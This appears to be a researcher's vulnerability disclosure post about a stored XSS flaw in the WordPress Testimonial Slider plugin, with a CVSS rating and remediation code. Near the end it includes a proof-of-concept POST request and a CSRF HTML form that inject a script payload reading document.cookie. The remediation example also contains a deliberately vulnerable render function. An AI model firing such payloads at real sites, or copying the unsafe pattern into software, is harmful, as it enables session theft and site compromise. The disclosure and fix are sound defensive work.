So instead of playing CTF challenges in the evening I decided to go for CVE hunting. As this was my first time really doing this, I opted to start easy with some WordPress plugins to find any vulnerabilities. Once I found a vulnerability I reported the details to email@example.com and then filled in the details in the CVE form to assign a CVE to the vulnerability. Unfortunately, the vulnerability had already been discovered before I found it.
Title: Stored XSS in Testimonial Slider plugin (WordPress)
Plugin: Testimonial Slider
CVSS score: 3.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:X)
Testimonial Slider version tested: 1.2.5
WordPress version tested: 4.9.6
Possible to combine with a CSRF attack if no other CSRF countermeasures are present in the WordPress application.
Escape all characters when outputting the values in the response. This could be done by using a proper escaping function in the file settings/sliders.php on line 97:
<li class="yellow"><a href="#tabs-<?php echo $slider['slider_id']; ?>"><?php echo htmlentities($slider['slider_name']); ?></a></li>
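To make the fix concrete, the following is an added example written for this post, not code taken from the Testimonial Slider plugin. It puts the unescaped output pattern beside two hardened renderers (plain htmlentities() and the WordPress esc_html()/esc_attr() helpers) and adds a nonce check to the slider-creation handler, which closes the CSRF combination noted above. The function names, the nonce action name and the $sliders records are constructed for the example; the WordPress helpers (esc_html, esc_attr, wp_nonce_field, check_admin_referer, current_user_can, sanitize_text_field, wp_unslash) only exist when the file runs inside WordPress, so the stand-alone demo at the bottom calls only the plain-PHP renderers.

```php
<?php
// Added example, not the plugin's own code. Names and sample data are constructed.

// Constructed sample records: the second one carries the kind of value an
// authenticated user could store as a slider name.
$sliders = [
    ['slider_id' => 1, 'slider_name' => 'Customer reviews'],
    ['slider_id' => 2, 'slider_name' => 'slider1<script>alert(1)</script>'],
];

// VULNERABLE pattern: the stored name is echoed straight into HTML, so '<' and '>'
// in the value become live markup in the admin page.
function render_tab_unsafe(array $slider): string {
    return '<li class="yellow"><a href="#tabs-' . (int) $slider['slider_id'] . '">'
        . $slider['slider_name'] . '</a></li>';
}

// HARDENED with plain PHP: htmlentities() with ENT_QUOTES encodes <, >, &, ' and ".
function render_tab_htmlentities(array $slider): string {
    return '<li class="yellow"><a href="#tabs-' . (int) $slider['slider_id'] . '">'
        . htmlentities($slider['slider_name'], ENT_QUOTES, 'UTF-8') . '</a></li>';
}

// HARDENED the WordPress way: esc_html() for text nodes, esc_attr() for attribute
// values. Only callable inside WordPress.
function render_tab_wp(array $slider): string {
    return '<li class="yellow"><a href="#tabs-' . esc_attr($slider['slider_id']) . '">'
        . esc_html($slider['slider_name']) . '</a></li>';
}

// CSRF countermeasure, form side: emit a nonce tied to the create action.
// 'testimonial_slider_create' and '_ts_nonce' are names chosen for this example.
function render_create_form(): void {
    echo '<form method="post">';
    wp_nonce_field('testimonial_slider_create', '_ts_nonce');
    echo '<input type="text" name="new_slider_name" />';
    echo '<input type="hidden" name="create_new_slider" value="1" />';
    echo '<input type="submit" name="create_new" value="Create New" />';
    echo '</form>';
}

// CSRF countermeasure, handler side: verify the nonce and the capability before
// any state change, and sanitise the name on input as well as on output.
function handle_create_slider(): void {
    if (!isset($_POST['create_new_slider'])) {
        return;
    }
    // Stops the request if the nonce is missing, expired or for another action.
    check_admin_referer('testimonial_slider_create', '_ts_nonce');
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions');
    }
    // sanitize_text_field() strips tags, so '<script>' never reaches storage.
    $name = sanitize_text_field(wp_unslash($_POST['new_slider_name']));
    // ... persist $name (storage omitted in this example)
}

// Stand-alone demonstration of the two plain-PHP renderers (no WordPress needed).
foreach ($sliders as $slider) {
    echo render_tab_unsafe($slider), "\n";
    echo render_tab_htmlentities($slider), "\n";
}
```

Output escaping is the fix that removes the XSS; input sanitisation and the nonce check are defence in depth, so apply all three rather than picking one.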
An authenticated user could store an XSS payload using the Testimonial Slider plugin. When creating a slider, the slider name is not sanitised for the '<' and '>' characters. Some characters are escaped (e.g. ' and "), which makes the vulnerability harder to exploit, but it is still possible. The following POST request shows an example of an XSS payload:
POST /wp-admin/admin.php?page=testimonial-slider-admin HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/wp-admin/admin.php?page=testimonial-slider-admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Cookie: <Cookies>
Connection: close
Upgrade-Insecure-Requests: 1

create_new_slider=1&new_slider_name=slider1<script>alert(document.cookie)</script>&create_new=Create+New&active_tab=2
The same request as an HTML form, for the CSRF scenario mentioned above:

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.example.com/wp-admin/admin.php?page=testimonial-slider-admin" method="POST">
      <input type="hidden" name="create_new_slider" value="1" />
      <input type="hidden" name="new_slider_name" value="slider1<script>alert(document.cookie)</script>" />
      <input type="hidden" name="create_new" value="Create New" />
      <input type="hidden" name="active_tab" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>